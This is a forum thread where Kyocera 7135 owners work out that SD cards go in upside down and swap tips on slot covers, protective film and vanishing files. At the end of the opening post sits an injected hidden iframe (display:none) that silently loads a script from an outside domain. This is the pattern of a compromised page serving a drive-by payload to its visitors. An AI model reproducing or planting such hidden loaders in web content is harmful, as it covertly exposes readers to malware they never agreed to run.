+ Reply to Thread
Page 1 of 6 1 2 3 4 5 ... LastLast

Thread: SD Card trouble

SD Card trouble

Well my new 7135 is here. But it doesn't seem to recognize my SD card. I put some MP3's in an /audio folder and put the card in the slot. Maybe I'm putting the card in wrong, but the Card Info application just says "No Card Inserted". How far in is the card supposed to go? Is is supposed to go in all the way until you can barely remove it with your fingernails? Mine does. Did I shove it in too far?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

OK I'm an idiot.

I had the card in upside down.

An easy mistake to make though. You'd think the card labeling should face you as you looked at the open 7135 but it doesn't. Finally I noticed on the rubber slot cover there's a tiny picture of the card orientation. I nearly needed a magnifying glass to see it!

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

SD CARD

WOW Jazz and you didnt mess up the slot?

I had the same trouble at first but i could not get the card to go in.
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

Don't panic people like that! lol
    iPhone therefore iAm.

Originally posted by Steve
    Don't panic people like that! lol
    AMEN!

"Scardy-Cat" can't handle it. :eek4

No that slot is tough. I must have put that card in the wrong way 20 times before I finally flipped it over. It works fine now and even "ejects" the card when I need to remove it.

That brings me to another question. Those rubber slot covers. Are they supposed to be completely removable? I was scared to try so my headset hole cover is just sort of folded back while the headset is plugged in.

did the same thing

Originally posted by jazmaan
    OK I'm an idiot.

An easy mistake to make though. You'd think the card labeling should face you as you looked at the open 7135 but it doesn't. Finally I noticed on the rubber slot cover there's a tiny picture of the card orientation. I nearly needed a magnifying glass to see it!
    I did exactly the same thing. Was stumped as to why I kept getting a mounting error when I tried to look at the card. Even had to use a screwdriver to get the card out. The docs on this are lacking (or I missed em). Finally tried it upside down, it worked. The spring action to get it out is actually quite nice.

HotSync...maybe we should add this to the FAQ section to give people a heads up that the SD/MMC cards go in upside down.

This was my first experience with an memory card, so I thought it was just me. Glad to see there were others that had the same problem.

Agreed on the rubber doors. Seems like over time these are gonna wear out and fall off.

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Actually an entire SD/MMC card FAQ needs to be written. Many people believe that that the SD card will solve all their memory problems only to find out that many programs can't read DB's off of the card. This is where appas such as PiDirect come in. And with the different type of apps that address this problem (i.e. PiDierect, PowerRun... etc) it just adds to the confusion. I am willing to write a FAQ cuzz i have been using cards with my M505 for alsmost 2 years. I will write one up in the format that HotSync has written the others and will submit it later tonight unless HotSync is already working on one.
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

It should be noted that the slot is spring loaded so you push the card IN to eject it.

I tried over and over again to grab it and pull it out before pushing the SD card in then it ejected enough so I could pull it out.
    Everything’s easy for those who don't know how to do it.

[QUOTE]Originally posted by jazmaan
    [B]OK I'm an idiot.

Don't sweat it. A lot of guys can get confused on their first time. Knowing where to put what, and in what direction will come with experience.:blush2

[QUOTE]Originally posted by jazmaan
    [B]That brings me to another question. Those rubber slot covers. Are they supposed to be completely removable?

Use the rubber slot cover.

Originally posted by Byrd Dog
    Actually an entire SD/MMC card FAQ needs to be written.
    DEFINITELY!!! I know that I could totally use such a FAQ, and would probably keep it handy until I got the hang of it.

I'm no newbie (been a die-hard Mac guy since high school), but I've never had a Palm before and I have no idea where certain files need to be in order for the device to properly recognize them (.MP3s for example).

Let us know when its posted!

Originally posted by jazmaan I had the card in upside down.
    You actually had the card the right way around, it was the phone that was upside down.

Ok here's another dumb newbie question. The front cover of the clamshell seems to have a clear plastic overlay over the metallic part. Am I supposed to peel that off?

funny

LOL...yes!

Originally posted by jazmaan
    Ok here's another dumb newbie question. The front cover of the clamshell seems to have a clear plastic overlay over the metallic part. Am I supposed to peel that off?
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Not too fast, there are two covers! There should have been a protective plastic sheet on the front of the clamshell and the PDA screen when you first opened it. There is also some sort of coating over the metal parts (both in and out) which I don't believe is to be removed. You can tell they are there if you gently run your finger nail over; you should feel a tacky suface. I have inspected it closely and it appears to be a permanent solution to keeping finger prints off the metal.

Well I don't even remember if there was a protective cover over the PDA screen. I don't seem to have one now, so I probably removed it in my excitement and forgot about it. But I definitely still have a protective cover over the clamshell which I can see bubbling around the Kyocera logo and can feel the edge of it with my fingernail and could easily peel it away. I know what you mean about the rest of the metal having some sort of coating but I wouldn't mess with that. I don't even think I'm going to remove the logo covering until it gets grungy.

how do you install SD cards?

Mine didn't exactly slide in easily and now it seems hard to get out. I don't want to insert it all the way until I see what I am doing.

Nothing about this in the manual

--Richard

Files on SD card vanishing

I use an external card reader to put movies and pictures on the card because it is SO MUCH FASTER, but when I reinsert the card I get odd behavior. Some files don't show up and are deleted somehow. Has anyone seen this and does anyone know what I can do to fix it?

+ Reply to Thread
Page 1 of 6 1 2 3 4 5 ... LastLast